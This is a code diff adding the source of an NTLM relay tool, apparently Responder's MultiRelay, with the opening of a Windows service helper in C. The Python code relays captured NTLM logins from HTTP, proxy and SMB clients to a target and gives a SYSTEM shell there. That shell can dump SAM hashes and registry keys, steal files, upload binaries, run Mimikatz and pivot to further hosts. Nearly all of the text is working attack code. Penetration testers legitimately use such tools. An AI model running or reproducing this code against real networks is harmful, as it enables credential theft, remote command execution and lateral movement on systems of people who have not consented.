+    print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
+    print('Usernames to relay (-u) are case sensitive.')
+    print('To kill this script hit CTRL-C.\n')
+    print(color('/*',8,1))
+    print('Use this script in combination with Responder.py for best results.')
+    print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
+    print('This tool listen on TCP port 80, 3128 and 445.')
+    print('For optimal pwnage, launch Responder only with these 2 options:')
+    print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
+    print('If you do so, use taskkill (as system) to kill the process.')
+    print(color('*/',8,1))
+    print(color('\nRelaying credentials for these users:',8,1))
+    print(color(UserToRelay,4,1))
+    print('\n')
+
+
+ShowWelcome()
+
+def ShowHelp():
+    print(color('Available commands:',8,0))
+    print(color('dump',8,1)+'               -> Extract the SAM database and print hashes.')
+    print(color('regdump KEY',8,1)+'        -> Dump an HKLM registry key (eg: regdump SYSTEM)')
+    print(color('read Path_To_File',8,1)+'  -> Read a file (eg: read /windows/win.ini)')
+    print(color('get  Path_To_File',8,1)+'  -> Download a file (eg: get users/administrator/desktop/password.txt)')
+    print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
+    print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
+    print(color('runas  Command',8,1)+'     -> Run a command as the currently logged in user. (eg: runas whoami)')
+    print(color('scan /24',8,1)+'           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
+    print(color('pivot  IP address',8,1)+'  -> Connect to another host (eg: pivot 10.0.0.12)')
+    print(color('mimi  command',8,1)+'      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
+    print(color('mimi32  command',8,1)+'    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
+    print(color('lcmd  command',8,1)+'      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
+    print(color('help',8,1)+'               -> Print this message.')
+    print(color('exit',8,1)+'               -> Exit this shell and return in relay mode.')
+    print('                      If you want to quit type exit and then use CTRL-C\n')
+    print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
+
+Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
+Logs = logging
+Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 is "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+	if PY2OR3 is "PY2":
+		return str(data)
+	else:
+		return str(data.decode('latin-1'))
+
+def StructPython2or3(endian,data):
+	#Python2...
+	if PY2OR3 == "PY2":
+		return struct.pack(endian, len(data))
+	#Python3...
+	else:
+		return struct.pack(endian, len(data)).decode('latin-1')
+
+def UploadContent(File):
+    with open(File,'rb') as f:
+        s = f.read()
+    FileLen = len(s.decode('latin-1'))
+    FileContent = s.decode('latin-1')
+    return FileLen, FileContent
+
+try:
+    RunFinger(Host[0])
+except:
+    raise
+    print("The host %s seems to be down or port 445 down."%(Host[0]))
+    sys.exit(1)
+
+
+def get_command():
+    global Cmd
+    Cmd = []
+    while any(x in Cmd for x in Cmd) is False:
+        Cmd = [input("C:\\Windows\\system32\\:#")]
+
+#Function used to make sure no connections are accepted while we have an open shell.
+#Used to avoid any possible broken pipe.
+def IsShellOpen():
+    #While there's nothing in our array return false.
+    if any(x in ShellOpen for x in ShellOpen) is False:
+        return False
+    #If there is return True.
+    else:
+        return True
+
+#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
+def IsPivotOn():
+    #While there's nothing in our array return false.
+    if Pivoting[0] == "2":
+        return False
+    #If there is return True.
+    if Pivoting[0] == "1":
+        print("pivot is on")
+        return True
+
+def ConnectToTarget():
+    try:
+        s = socket(AF_INET, SOCK_STREAM)
+        s.connect((Host[0],445))
+        return s
+    except:
+        try:
+            sys.exit(1)
+            print("Cannot connect to target, host down?")
+        except:
+            pass
+
+class HTTPProxyRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+            if IsPivotOn():
+                return None
+        except:
+            raise
+
+        s = ConnectToTarget()
+        try:
+            data = self.request.recv(8092)
+            ##First we check if it's a Webdav OPTION request.
+            Webdav = ServeOPTIONS(data)
+            if Webdav:
+                #If it is, send the option answer, we'll send him to auth when we receive a profind.
+                self.request.send(Webdav)
+                data = self.request.recv(4096)
+
+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+            ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
+            if NTLM_Auth:
+                #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
+                Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+            if Packet_NTLM == "\x01":
+                ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+                h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+                n = SMBNegoCairo(Data = SMBNegoCairoData())
+                n.calculate()
+                packet0 = str(h)+str(n)
+                buffer0 = longueur(packet0)+packet0
+                s.send(buffer0)
+                smbdata = s.recv(2048)
+                ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                if smbdata[8:10] == "\x72\x00":
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+                    t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                    t.calculate()
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    s.send(NetworkSendBufferPython2or3(buffer1))
+                    smbdata = s.recv(2048) #got it here.
+
+                ## Send HTTP Proxy
+                Buffer_Ans = WPAD_NTLM_Challenge_Ans()
+                Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+                self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+                data = self.request.recv(8092)
+                NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+                ##Got NTLM Message 3 from client.
+                if Packet_NTLM == "\x03":
+                    NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                    ##Might be anonymous, verify it and if so, send no go to client.
+                    if IsSMBAnonymous(NTLM_Auth):
+                        Response = WPAD_Auth_407_Ans()
+                        self.request.send(str(Response))
+                        data = self.request.recv(8092)
+                else:
+                    #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                    #and has not attempted before. While at it, let's grab his hash.
+                    Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+                    if Username is not None:
+                        head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                        t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                        t.calculate()
+                        packet1 = str(head)+str(t)
+                        buffer1 = longueur(packet1)+packet1
+                        print("[+] SMB Session Auth sent.")
+                        s.send(NetworkSendBufferPython2or3(buffer1))
+                        smbdata = s.recv(2048)
+                        RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                        if RunCmd is None:
+                            s.close()
+                            self.request.close()
+                            return None
+
+            else:
+                ##Any other type of request, send a 407.
+                Response = WPAD_Auth_407_Ans()
+                self.request.send(str(Response))
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+
+class HTTPRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+            if IsPivotOn():
+                return None
+        except:
+            raise
+
+        try:
+            s = ConnectToTarget()
+
+            data = self.request.recv(8092)
+            ##First we check if it's a Webdav OPTION request.
+            Webdav = ServeOPTIONS(data)
+            if Webdav:
+                #If it is, send the option answer, we'll send him to auth when we receive a profind.
+                self.request.send(NetworkSendBufferPython2or3(Webdav))
+                data = self.request.recv(4096)
+
+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+            ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
+            if NTLM_Auth:
+                #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
+                Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+                if Packet_NTLM == "\x01":
+                    ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+                    h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+                    n = SMBNegoCairo(Data = SMBNegoCairoData())
+                    n.calculate()
+                    packet0 = str(h)+str(n)
+                    buffer0 = longueur(packet0)+packet0
+                    s.send(buffer0)
+                    smbdata = s.recv(2048)
+                    ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                    if smbdata[8:10] == "\x72\x00":
+                        head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+                        t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                        t.calculate()
+                        packet1 = str(head)+str(t)
+                        buffer1 = longueur(packet1)+packet1
+                        s.send(NetworkSendBufferPython2or3(buffer1))
+                        smbdata = s.recv(2048) #got it here.
+
+                    ## Send HTTP Response.
+                    Buffer_Ans = IIS_NTLM_Challenge_Ans()
+                    Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                    key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+                    self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+                    data = self.request.recv(8092)
+                    NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                    Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+                    ##Got NTLM Message 3 from client.
+                    if Packet_NTLM == "\x03":
+                        NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                    ##Might be anonymous, verify it and if so, send no go to client.
+                    if IsSMBAnonymous(NTLM_Auth):
+                        Response = IIS_Auth_401_Ans()
+                        self.request.send(str(Response))
+                        data = self.request.recv(8092)
+                    else:
+                        #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                        #and has not attempted before. While at it, let's grab his hash.
+                        Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+
+                        if Username is not None:
+                            head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                            t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                            t.calculate()
+                            packet1 = str(head)+str(t)
+                            buffer1 = longueur(packet1)+packet1
+                            print("[+] SMB Session Auth sent.")
+                            s.send(NetworkSendBufferPython2or3(buffer1))
+                            smbdata = s.recv(2048)
+                            RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                            if RunCmd is None:
+                                s.close()
+                                self.request.close()
+                                return None
+
+            else:
+                ##Any other type of request, send a 401.
+                Response = IIS_Auth_401_Ans()
+                self.request.send(str(Response))
+
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+class SMBRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+        except:
+            raise
+
+        try:
+            s = ConnectToTarget()
+
+            data = self.request.recv(8092)
+
+            ##Negotiate proto answer. That's us.
+            if data[8:10] == b'\x72\x00':
+                Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
+                Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+                packet1 = str(Header)+str(Body)
+                Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+                self.request.send(NetworkSendBufferPython2or3(Buffer))
+                data = self.request.recv(4096)
+
+            ## Make sure it's not a Kerberos auth.
+            if data.find(b'NTLM') is not -1:
+                ## Start with nego protocol + session setup negotiate to our target.
+                data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
+
+                ## Make sure it's not a Kerberos auth.
+            if data.find(b'NTLM') is not -1:
+            ##Relay all that to our client.
+                if data[8:10] == b'\x73\x00':
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                    #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
+                    #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
+                    t = smbdata[36:].decode('latin-1')
+                    packet0 = str(head)+str(t)
+                    buffer0 = longueur(packet0)+packet0
+                    self.request.send(NetworkSendBufferPython2or3(buffer0))
+                    data = self.request.recv(4096)
+            else:
+                #if it's kerberos, ditch the connection.
+                s.close()
+                return None
+
+            if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
+                ##Send logon failure for anonymous logins.
+                head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                t = SMBSessEmpty()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1
+                self.request.send(NetworkSendBufferPython2or3(buffer1))
+                s.close()
+                return None
+
+            else:
+                #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                #and has not attempted before. While at it, let's grab his hash.
+                Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
+                if Username is not None:
+                    ##Got the ntlm message 3, send it over to SMB.
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
+                    t = data[36:].decode('latin-1')#Final relay.
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    if Pivoting[0] == "1":
+                        pass
+                    else:
+                        print("[+] SMB Session Auth sent.")
+                    s.send(NetworkSendBufferPython2or3(buffer1))
+                    smbdata = s.recv(4096)
+                    #We're all set, dropping into shell.
+                    RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                    #If runcmd is None it's because tree connect was denied for this user.
+                    #This will only happen once with that specific user account.
+                    #Let's kill that connection so we can force him to reauth with another account.
+                    if RunCmd is None:
+                        s.close()
+                        return None
+
+                else:
+                    ##Send logon failure, so our client might authenticate with another account.
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                    t = SMBSessEmpty()
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    self.request.send(NetworkSendBufferPython2or3(buffer1))
+                    data = self.request.recv(4096)
+                    self.request.close()
+                    return None
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+
+#Interface starts here.
+def RunShellCmd(data, s, clientIP, Target, Username, Domain):
+
+    #Let's declare our globals here..
+    #Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
+    global Pivoting
+    #Update Host, when pivoting is used.
+    global Host
+    #Make sure we don't open 2 shell at the same time..
+    global ShellOpen
+    ShellOpen = ["Shell is open"]
+
+    # On this block we do some verifications before dropping the user into the shell.
+    if data[8:10] == b'\x73\x6d':
+        print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
+        print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    if data[8:10] == b'\x73\x8d':
+        print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    if data[8:10] == b'\x73\x5e':
+        print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
+        del ShellOpen[:]
+        return False
+
+    ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
+    ## Tree Connect
+    if data[8:10] == b'\x73\x00':
+        GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+        t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
+        t.calculate()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1
+        s.send(NetworkSendBufferPython2or3(buffer1))
+        data = s.recv(2048)
+
+    ## Nope he doesn't.
+    if data[8:10] == b'\x75\x22':
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+            Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
+    if data[8:10] == b'\x75\xcc':
+        print("[+] Tree Connect AndX denied. Bad Network Name returned.")
+        del ShellOpen[:]
+        return False
+
+    ## Tree Connect on C$ is successfull.
+    if data[8:10] == b'\x75\x00':
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Looks good, "+Username+" has admin rights on C$.")
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+        t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
+        t.calculate()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1
+        s.send(NetworkSendBufferPython2or3(buffer1))
+        data = s.recv(2048)
+
+    ## Run one command.
+    if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
+        print("[+] Authenticated.")
+        if OneCommand != None:
+            print("[+] Running command: %s"%(OneCommand))
+            RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
+        if Dump:
+            print("[+] Dumping hashes")
+            DumpHashes(data, s, Target[0])
+        os._exit(1)
+
+    ## Drop into the shell.
+    if data[8:10] == b'\x75\x00' and OneCommand == None:
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
+            ShowHelp()
+        Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
+        print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
+
+    while True:
+
+        ## We either just arrived here or we're back from a command operation, let's setup some stuff.
+        if data[8:10] == b'\x75\x00':
+        #start a thread for raw_input, so we can do other stuff while we wait for a command.
+            t = Thread(target=get_command, args=())
+            t.daemon = True
+            t.start()
+
+            #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
+            #to maintain MultiRelay alive and well.
+            count = 0
+            DoEvery = random.randint(10, 45)
+            while any(x in Cmd for x in Cmd) is False:
+                count = count+1
+                SMBKeepAlive(s, data)
+                if count == DoEvery:
+                    DumbSMBChain(data, s, Target[0])
+                    count = 0
+                if any(x in Cmd for x in Cmd) is True:
+                    break
+
+            ##Grab the commands. Cmd is global in get_command().
+            DumpReg = re.findall('^dump', Cmd[0])
+            Read    = re.findall('^read (.*)$', Cmd[0])
+            RegDump = re.findall('^regdump (.*)$', Cmd[0])
+            Get     = re.findall('^get (.*)$', Cmd[0])
+            Upload  = re.findall('^upload (.*)$', Cmd[0])
+            Delete  = re.findall('^delete (.*)$', Cmd[0])
+            RunAs   = re.findall('^runas (.*)$', Cmd[0])
+            LCmd    = re.findall('^lcmd (.*)$', Cmd[0])
+            Mimi    = re.findall('^mimi (.*)$', Cmd[0])
+            Mimi32  = re.findall('^mimi32 (.*)$', Cmd[0])
+            Scan    = re.findall('^scan (.*)$', Cmd[0])
+            Pivot   = re.findall('^pivot (.*)$', Cmd[0])
+            Help    = re.findall('^help', Cmd[0])
+
+            if Cmd[0] == "exit":
+                print("[+] Returning in relay mode.")
+                del Cmd[:]
+                del ShellOpen[:]
+                return None
+
+            ##For all of the following commands we send the data (var: data) returned by the
+            ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
+            ##We also clean up the command array when done.
+            if DumpReg:
+                data = DumpHashes(data, s, Target[0])
+                del Cmd[:]
+
+            if Read:
+                File = Read[0]
+                data = ReadFile(data, s, File, Target[0])
+                del Cmd[:]
+
+            if Get:
+                File = Get[0]
+                data = GetAfFile(data, s, File, Target[0])
+                del Cmd[:]
+
+            if Upload:
+                File = Upload[0]
+                if os.path.isfile(File):
+                    FileSize, FileContent = UploadContent(File)
+                    File = os.path.basename(File)
+                    data = WriteFile(data, s, File,  FileSize, FileContent, Target[0])
+                    del Cmd[:]
+                else:
+                    print(File+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Delete:
+                Filename = Delete[0]
+                data = DeleteFile(data, s, Filename, Target[0])
+                del Cmd[:]
+
+            if RegDump:
+                Key = RegDump[0]
+                data = SaveAKey(data, s, Target[0], Key)
+                del Cmd[:]
+
+            if RunAs:
+                if os.path.isfile(RunAsFileName):
+                    FileSize, FileContent = UploadContent(RunAsFileName)
+                    FileName = os.path.basename(RunAsFileName)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = RunAs[0]
+                    data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
+                    del Cmd[:]
+                else:
+                    print(RunAsFileName+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if LCmd:
+                subprocess.call(LCmd[0], shell=True)
+                del Cmd[:]
+
+            if Mimi:
+                if os.path.isfile(MimikatzFilename):
+                    FileSize, FileContent = UploadContent(MimikatzFilename)
+                    FileName = os.path.basename(MimikatzFilename)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = Mimi[0]
+                    data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+                    del Cmd[:]
+                else:
+                    print(MimikatzFilename+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Mimi32:
+                if os.path.isfile(Mimikatzx86Filename):
+                    FileSize, FileContent = UploadContent(Mimikatzx86Filename)
+                    FileName = os.path.basename(Mimikatzx86Filename)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = Mimi32[0]
+                    data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+                    del Cmd[:]
+                else:
+                    print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Pivot:
+                if Pivot[0] == Target[0]:
+                    print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
+                    del Pivot[:]
+                    del Cmd[:]
+                else:
+                    if ShowSigning(Pivot[0]):
+                        del Pivot[:]
+                        del Cmd[:]
+                    else:
+                        if os.path.isfile(RunAsFileName):
+                            FileSize, FileContent = UploadContent(RunAsFileName)
+                            FileName = os.path.basename(RunAsFileName)
+                            data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                            RunAsPath = '%windir%\\Temp\\'+FileName
+                            Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
+
+                            if Status == True:
+                                print("[+] Pivoting to %s."%(Pivot[0]))
+                                if os.path.isfile(RunAsFileName):
+                                    FileSize, FileContent = UploadContent(RunAsFileName)
+                                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                                    #shell will close.
+                                    del ShellOpen[:]
+                                    #update the new host.
+                                    Host = [Pivot[0]]
+                                    #we're in pivoting mode.
+                                    Pivoting = ["1"]
+                                    data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
+                                    del Cmd[:]
+                                    s.close()
+                                    return None
+
+                            if Status == False:
+                                print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
+                                del Cmd[:]
+                                del Pivot[:]
+                        else:
+                            print(RunAsFileName+" does not exist, please specify a valid file.")
+                            del Cmd[:]
+
+            if Scan:
+                LocalIp = FindLocalIp()
+                Range = ConvertToClassC(Target[0], Scan[0])
+                RunPivotScan(Range, Target[0])
+                del Cmd[:]
+
+            if Help:
+                ShowHelp()
+                del Cmd[:]
+
+            ##Let go with the command.
+            if any(x in Cmd for x in Cmd):
+                if len(Cmd[0]) > 1:
+                    if os.path.isfile(SysSVCFileName):
+                        FileSize, FileContent = UploadContent(SysSVCFileName)
+                        FileName = os.path.basename(SysSVCFileName)
+                        RunPath = '%windir%\\Temp\\'+FileName
+                        data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                        data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
+                        del Cmd[:]
+                    else:
+                        print(SysSVCFileName+" does not exist, please specify a valid file.")
+                        del Cmd[:]
+        if isinstance(data, str):
+           data = data.encode('latin-1')
+        if data is None:
+            print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
+
+        if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
+            head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+            t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
+            t.calculate()
+            packet1 = str(head)+str(t)
+            buffer1 = longueur(packet1)+packet1
+            s.send(NetworkSendBufferPython2or3(buffer1))
+            data = s.recv(2048)
+
+class ThreadingTCPServer(TCPServer):
+    def server_bind(self):
+        TCPServer.server_bind(self)
+
+ThreadingTCPServer.allow_reuse_address = 1
+ThreadingTCPServer.daemon_threads = True
+
+def serve_thread_tcp(host, port, handler):
+    try:
+        server = ThreadingTCPServer((host, port), handler)
+        server.serve_forever()
+    except:
+        print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
+
+def main():
+    try:
+        threads = []
+        threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
+        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
+        threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
+        if ExtraPort != 0:
+            threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
+        for thread in threads:
+            thread.setDaemon(True)
+            thread.start()
+
+        while True:
+            time.sleep(1)
+
+    except (KeyboardInterrupt, SystemExit):
+        ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
+        ##This is a bug in python readline when dealing with raw_input()..
+        if ShellOpen:
+            os.system('stty sane')
+        ##Then exit
+        sys.exit("\rExiting...")
+
+if __name__ == '__main__':
+    main()

tools/MultiRelay/bin/Runas.c

@@ -0,0 +1,100 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+#include <userenv.h>
+#include <wtsapi32.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
